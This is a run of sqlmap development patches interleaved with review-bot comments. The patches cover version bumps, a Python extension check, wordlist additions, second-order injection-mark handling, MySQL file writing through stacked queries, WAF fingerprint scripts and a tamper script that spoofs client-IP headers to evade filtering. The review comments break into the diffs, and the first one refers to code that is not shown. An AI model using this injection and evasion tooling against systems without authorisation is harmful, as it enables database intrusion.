-78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py +2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py @@ -478,4 +478,4 @@ fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -a5eecbca03800851635817e0ca832a92 xml/queries.xml +b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 642182b7a62..7278fb08523 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -46,8 +46,8 @@ - - + + From 63b84c31e5e55fa1005ce4f524a3b8f3c4a42987 Mon Sep 17 00:00:00 2001 
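Review bot: The `logger.info(infoMsg)` reporting skipped system databases now sits inside the new `for query, condition in (...)` loop, so when the primary query yields nothing and `query2` is tried the same "skipping system database" line is logged a second time; build and log that message once before the loop and keep only the `IN (...)` clause construction inside it. The loop also enters its first iteration only because `isNoneValue([])` is true for the initial `values = []`, which is easy to misread as "values found"; a one-line comment such as `# isNoneValue([]) is True, so the primary query always runs first` would make the break condition self-explanatory. getTables continues outside the hunk.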
From: Miroslav Stampar Date: Sat, 8 Sep 2018 23:36:08 +0200 Subject: [PATCH 271/428] Update regarding the #3229 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 14 +++++++++----- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 18cb2f44fa3..51c44ce1bb5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.12" +VERSION = "1.2.9.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index 4cbecb0dc72..f57ea0682e8 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -12,12 +12,16 @@ if PYVERSION >= "3" or PYVERSION < "2.6": exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) +errors = [] extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") -try: - for _ in extensions: +for _ in extensions: + try: __import__(_) -except ImportError: - errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) + except ImportError: + errors.append(_) + +if errors: + errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in errors)) errMsg += "most likely because current version of Python has been " - errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" + errMsg += "built without appropriate dev packages" exit(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c91220820d4..86c7c7d17e7 100644 --- a/txt/checksum.md5 
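Review bot: In the rewritten `for _ in extensions:` loop the variable `_` is no longer a throwaway: the `except ImportError` branch appends it to `errors`, so the underscore hides a value that matters and collides visually with the `_` bound inside the `", ".join(...)` generator below. `for name in extensions:` / `__import__(name)` / `errors.append(name)` reads as intended. Since the message now lists exactly the missing extensions rather than the full tuple, the wording "missing one or more core extensions" could also be tightened to reflect what is printed.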
+++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -39a71984ff7fd683d06c489f33d477a7 lib/core/settings.py +20762b473b8d387b6f2d6b13aafb0ff1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -118,7 +118,7 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py +faa7536c4788ee118b19338f3e98e556 lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py From c36749c3bbf5db222c936e7ecf5b048de70d6a1e Mon Sep 17 00:00:00 2001 From: Ehsan Nezami Date: Mon, 10 Sep 2018 01:26:28 -0700 Subject: [PATCH 272/428] add u_pass to columns (#3231) --- txt/common-columns.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/txt/common-columns.txt b/txt/common-columns.txt index bc9f0a0e2f2..3535a2e4c20 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -1,6 +1,6 @@ # Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission - +u_pass id name user_id From f01ae291f8ec77fdb049d316a1978e22f84bad7b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 10:27:28 +0200 Subject: [PATCH 273/428] Update related to the #3231 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- txt/common-columns.txt | 6 +++++- 3 files changed, 7 insertions(+), 3 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 51c44ce1bb5..18350e10778 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.13" +VERSION = "1.2.9.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 86c7c7d17e7..f3e89a5ba44 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -20762b473b8d387b6f2d6b13aafb0ff1 lib/core/settings.py +39d2ca4b1e85f4cf9ac27d965a758ea4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py diff --git a/txt/common-columns.txt b/txt/common-columns.txt index 3535a2e4c20..8efec7578e2 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -1,6 +1,6 @@ # Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission -u_pass + id name user_id @@ -2601,3 +2601,7 @@ waktu # WebGoat cookie login_count + +# Misc + +u_pass \ No newline at end of file From 470b68a83cfcaa1fcfbb6b42f544ab040282d7c8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 11:47:19 +0200 Subject: [PATCH 274/428] Implementation for Issue #3226 --- lib/core/settings.py | 2 +- lib/request/connect.py | 14 ++++++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 15 insertions(+), 5 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 18350e10778..7de5f884a72 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.14" +VERSION = "1.2.9.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1bcc2c1a43c..199dd8284da 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -16,6 +16,7 @@ import struct import time import traceback +import urllib import urllib2 import urlparse @@ -84,6 +85,7 @@ class WebSocketException(Exception): from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER @@ -97,6 +99,7 @@ class WebSocketException(Exception): from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES +from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IS_WIN from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER 
@@ -1238,8 +1241,15 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - elif kb.secondReq: - page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""): + def _(value): + if CUSTOM_INJECTION_MARK_CHAR in (value or "") and kb.customInjectionMark: + if payload is None: + value = value.replace(CUSTOM_INJECTION_MARK_CHAR, "") + else: + value = re.sub(r"\w*%s" % re.escape(CUSTOM_INJECTION_MARK_CHAR), payload, value) + return value + page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f3e89a5ba44..8b0fb71b654 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -39d2ca4b1e85f4cf9ac27d965a758ea4 lib/core/settings.py +c4ab9e38f258b0666e19ffdb5537cbbf lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
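Review bot: In the nested `_` helper, `payload` is passed to `re.sub` as the replacement string, so backslash sequences in it (`\1`, `\g<name>`, `\\`) are interpreted as group references or escapes instead of being inserted literally, and a payload ending in a lone backslash makes `re.sub` raise; use a callable replacement, `re.sub(r"\w*%s" % re.escape(CUSTOM_INJECTION_MARK_CHAR), lambda m: payload, value)`, so the payload goes in verbatim. The same applies to the follow-up hunk in lib/request/connect.py at `@@ -1243,11 +1243,11 @@`, which only swaps the constant for `kb.customInjectionMark`. The helper's parameter `value` also shadows the enclosing function's `value` used in the `elif` condition right above it; renaming the parameter (e.g. `def _(text):`) removes the ambiguity. The enclosing function starts and ends outside the hunk.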
@@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -4ac4e1d10210bb1bc3d64a3532c5ff8b lib/request/connect.py +3146b6639369b3f629e23860baffff17 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From c9a73aeed104aacbc549abae6e1c156cb58ee726 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 11:51:00 +0200 Subject: [PATCH 275/428] Minor patch for #3226 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7de5f884a72..fa7c35e647a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.15" +VERSION = "1.2.9.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 199dd8284da..0c24e576517 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -1243,11 +1243,11 @@ def _randomizeParameter(paramString, randomParameter): page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""): def _(value): - if CUSTOM_INJECTION_MARK_CHAR in (value or "") and kb.customInjectionMark: + if kb.customInjectionMark in (value or ""): if payload is None: - value = value.replace(CUSTOM_INJECTION_MARK_CHAR, "") + value = value.replace(kb.customInjectionMark, "") else: - value = re.sub(r"\w*%s" % re.escape(CUSTOM_INJECTION_MARK_CHAR), payload, value) + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value) return value page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8b0fb71b654..3877c4aa9ed 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4ab9e38f258b0666e19ffdb5537cbbf lib/core/settings.py +b8cbaa6f57a74b5ad7c258d93dcd8f0c lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
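Review bot: The rewritten condition `if kb.customInjectionMark in (value or ""):` drops the `and kb.customInjectionMark` guard the previous version had; if `kb.customInjectionMark` can ever be `None` the membership test raises `TypeError`, and if it can be an empty string the test is always true and `re.sub(r"\w*", payload, value)` inserts the payload at every word boundary. Unless the attribute is guaranteed to be a non-empty string at this point, keep the guard: `if kb.customInjectionMark and kb.customInjectionMark in (value or ""):`. The enclosing function starts and ends outside the hunk.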
@@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -3146b6639369b3f629e23860baffff17 lib/request/connect.py +cb148ee9778fdd61bdfc6b524aa1b3a2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From a8c07226318ab904a389d567aa916399602460d2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 12:43:59 +0200 Subject: [PATCH 276/428] Minor update regarding #3230 --- lib/core/dicts.py | 4 ++++ lib/core/settings.py | 2 +- plugins/dbms/mysql/filesystem.py | 2 ++ txt/checksum.md5 | 6 +++--- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 4ea69a8a53c..b291aeff947 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -263,6 +263,10 @@ "commit ", "rollback ", ), + + "SQL administration": ( + "set ", + ), } POST_HINT_CONTENT_TYPES = { diff --git a/lib/core/settings.py b/lib/core/settings.py index fa7c35e647a..494f81ca2ec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.16" +VERSION = "1.2.9.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 15819ab67c1..a81c9d1b65a 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py 
@@ -162,6 +162,8 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("inserting the hexadecimal encoded file to the support table") + inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) + for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3877c4aa9ed..78b187eb6d1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -36,7 +36,7 @@ a69c59bec0b35442139d1c29f1b05797 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py +4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b8cbaa6f57a74b5ad7c258d93dcd8f0c lib/core/settings.py +d9d75c1383a83e6ccabf7157202c2288 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
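Review bot: `SET GLOBAL max_allowed_packet = %d` with a fixed 1MB forces the server-wide value regardless of its current setting, so on a server already configured above 1MB the statement lowers the limit for every connection, and nothing restores the previous value after the inserts complete. Consider only raising it, `inject.goStacked("SET GLOBAL max_allowed_packet = GREATEST(@@GLOBAL.max_allowed_packet, %d)" % (1024 * 1024))`, and moving the inline `1024 * 1024` into a named constant in lib/core/settings.py with the #3230 reference as its comment. stackedWriteFile starts and ends outside the hunk.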
@@ -172,7 +172,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -2f97535b5cfb28eac0d51bf67a0304f7 plugins/dbms/mysql/filesystem.py +34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py 34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py From 16c052ef1368b49295991cefdadd23022ce1738c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 12 Sep 2018 14:39:07 +0200 Subject: [PATCH 277/428] Fixes #3234 (user entered input) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 55379f7b203..98ba41adfff 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1179,7 +1179,7 @@ def checkFile(filename, raiseOnError=True): try: if filename is None or not os.path.isfile(filename): valid = False - except UnicodeError: + except: valid = False if valid: diff --git a/lib/core/settings.py b/lib/core/settings.py index 494f81ca2ec..2b15c294a90 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.17" +VERSION = "1.2.9.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 78b187eb6d1..3e6f9d37f1f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
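Review bot: Replacing `except UnicodeError:` with a bare `except:` in checkFile also catches `KeyboardInterrupt` and `SystemExit`, so an interrupt during the `os.path.isfile` call is swallowed and reported as an invalid file; `except Exception:` keeps the broadened handling for odd user-entered paths without trapping interrupts. A short why-comment, `# broadened from UnicodeError: os.path.isfile can raise other errors on malformed user input (#3234)`, would record why the narrower clause was not enough. checkFile continues outside the hunk.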
@@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -a69c59bec0b35442139d1c29f1b05797 lib/core/common.py +cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d9d75c1383a83e6ccabf7157202c2288 lib/core/settings.py +9b9a0dbc9e47aa07545f1e157ebb3d4e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From db8bcd1d2e0bf0ead66ebbef9e07ff40e996408e Mon Sep 17 00:00:00 2001 From: xxbing <35004327+xxbing@users.noreply.github.com> Date: Thu, 13 Sep 2018 16:50:58 +0800 Subject: [PATCH 278/428] update xforwarder tamper (#3236) --- tamper/xforwardedfor.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index 6cd5c81131b..f4cdda1140a 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -25,4 +25,6 @@ def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() + headers["X-Clinet-Ip"] = randomIP() + headers["X-Real-Ip"] = randomIP() return payload From 6697e49f753f27cfd6abb2ee5054cbd204d15ea9 Mon Sep 17 00:00:00 2001 
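Review bot: The added header name `X-Clinet-Ip` is misspelled, so the line sets a header that nothing recognises; the intended name is `X-Client-IP`, i.e. `headers["X-Client-IP"] = randomIP()`. For consistency with the existing `X-Forwarded-For` capitalisation the next line would read `headers["X-Real-IP"] = randomIP()`. If the module docstring above the hunk describes the header(s) this tamper appends, it should list the new ones as well.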
From: Miroslav Stampar Date: Thu, 13 Sep 2018 11:09:17 +0200 Subject: [PATCH 279/428] Adding aesecure and crawlprotect WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +++- waf/aesecure.py | 25 +++++++++++++++++++++++++ waf/crawlprotect.py | 19 +++++++++++++++++++ 4 files changed, 48 insertions(+), 2 deletions(-) create mode 100644 waf/aesecure.py create mode 100644 waf/crawlprotect.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b15c294a90..87472e89d0c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.18" +VERSION = "1.2.9.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3e6f9d37f1f..9b1307fc7cb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9b9a0dbc9e47aa07545f1e157ebb3d4e lib/core/settings.py +ef7c758b79feb71ddb3376df9149d562 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
@@ -392,6 +392,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py +0ce8a335c7eb9cf14e645f64b3a5e91f waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py @@ -407,6 +408,7 @@ ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py 29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py +c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py 0182d23b34cf903537f77f4ec4b144bf waf/distil.py diff --git a/waf/aesecure.py b/waf/aesecure.py new file mode 100644 index 00000000000..083d1aad445 --- /dev/null +++ b/waf/aesecure.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "aeSecure (aeSecure)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, _ = get_page(get=vector) + retval = headers.get("aeSecure-code") is not None + retval |= all(_ in (page or "") for _ in ("aeSecure", "aesecure_denied.png")) + if retval: + break + + return retval diff --git a/waf/crawlprotect.py b/waf/crawlprotect.py new file mode 100644 index 00000000000..ed1698f961b --- /dev/null +++ b/waf/crawlprotect.py 
